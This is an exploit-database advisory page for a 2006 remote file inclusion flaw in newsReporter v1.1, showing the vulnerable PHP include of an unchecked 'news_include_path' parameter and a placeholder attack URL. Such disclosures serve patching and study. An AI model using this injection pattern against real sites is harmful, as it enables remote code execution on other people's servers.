header-logo
Suggest Exploit
vendor:
newsReporter
by:
milw0rm.com
7,5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: newsReporter
Affected Version From: newsReporter v1.1
Affected Version To: newsReporter v1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Kurdish Security newsReporter v1.1 Remote Command Execution

A vulnerability in newsReporter v1.1 allows remote attackers to execute arbitrary commands via a crafted news_include_path parameter to index.php.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

>>> Kurdish Security

>>> newsReporter v1.1 Remote Command Execution

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Rish : High

>>> Class : Remote

>>> Script : newsReporter

>>> Site : http://www.knusperleicht.at

Code :

// removed the old code because it was not correct. /str0ke

//  INCLUDE PATH
@define(NEWS_INCLUDE_PATH, $news_include_path);
//  INCLUDE PATH

//Dateien importieren
include NEWS_INCLUDE_PATH."inc/config.inc.php";

Vulnerability :
http://www.site.com/[scriptpath]/index.php?news_include_path=[script]

# milw0rm.com [2006-08-01]